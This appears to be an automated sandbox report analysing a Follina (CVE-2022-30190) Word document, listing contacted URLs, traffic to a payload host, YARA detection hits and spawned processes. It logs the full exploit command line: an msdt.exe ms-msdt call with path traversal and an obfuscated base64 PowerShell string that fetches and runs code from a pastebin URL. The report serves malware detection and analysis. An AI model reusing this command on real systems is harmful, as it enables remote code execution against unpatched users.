          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://management.azure.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://management.azure.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://messaging.action.office.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://messaging.engagement.office.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://messaging.office.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://ncus.contentsync.
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://ncus.pagecontentsync.
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://officeapps.live.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://onedrive.live.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://onedrive.live.com/embed?
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://osi.office.net
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://otelrules.azureedge.net
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office365.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office365.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://pages.store.office.com/review/query
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://powerlift.acompli.net
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://roaming.edog.
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://settings.outlook.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://shell.suite.office.com:1443
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://skyapi.live.net/Activity/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://staging.cortana.ai
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://store.office.cn/addinstemplate
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://store.office.de/addinstemplate
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://tasks.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://web.microsoftstream.com/video/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://webshell.suite.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://wus2.contentsync.
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://wus2.pagecontentsync.
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
          Source: ~WRS{D36977B3-ADC1-4109-A787-B8962B69C0CF}.tmp.0.drString found in binary or memory: https://www.malwarejake.com/456.html
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://www.odwebp.svc.ms
          Source: unknownDNS traffic detected: queries for: www.malwarejake.com
          Source: global trafficHTTP traffic detected: GET /456.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: www.malwarejake.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /456.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: www.malwarejake.comIf-Modified-Since: Tue, 31 May 2022 01:57:49 GMTIf-None-Match: "1b90-5e045198f8aaa"Connection: Keep-Alive
          Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.4:49744 version: TLS 1.2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
          Source: sslproxydump.pcap, type: PCAPMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
          Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
          Source: 00000005.00000002.618908929.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: 00000005.00000002.619006579.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: 00000005.00000002.625957459.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: 00000005.00000002.618774388.0000000001060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: Process Memory Space: msdt.exe PID: 5472, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
          Source: DiagPackage.dll.mui.5.drStatic PE information: No import functions for PE file found
          Source: DiagPackage.dll.5.drStatic PE information: No import functions for PE file found
          Source: DiagPackage.dll.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DiagPackage.dll.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DiagPackage.dll.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dllJump to behavior
          Source: qoIZSkdejM.docxVirustotal: Detection: 35%
          Source: qoIZSkdejM.docxMetadefender: Detection: 22%
          Source: qoIZSkdejM.docxReversingLabs: Detection: 44%
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uhgycnj1\uhgycnj1.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67B5.tmp" "c:\Users\user\AppData\Local\Temp\uhgycnj1\CSC5D456D749058409DBC18DA207571A96.TMP"
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7E0C.tmp" "c:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP"
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2066.tmp" "c:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP"
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTOJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67B5.tmp" "c:\Users\user\AppData\Local\Temp\uhgycnj1\CSC5D456D749058409DBC18DA207571A96.TMP"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7E0C.tmp" "c:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2066.tmp" "c:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP"Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32Jump to behavior
          Source: qoIZSkdejM.LNK.0.drLNK file: ..\..\..\..\..\Desktop\qoIZSkdejM.docx
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{339CE15B-6A00-4ACA-8F52-6DF2F427972A} - OProcSessId.datJump to behavior
          Source: classification engineClassification label: mal100.expl.evad.winDOCX@14/31@2/1
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
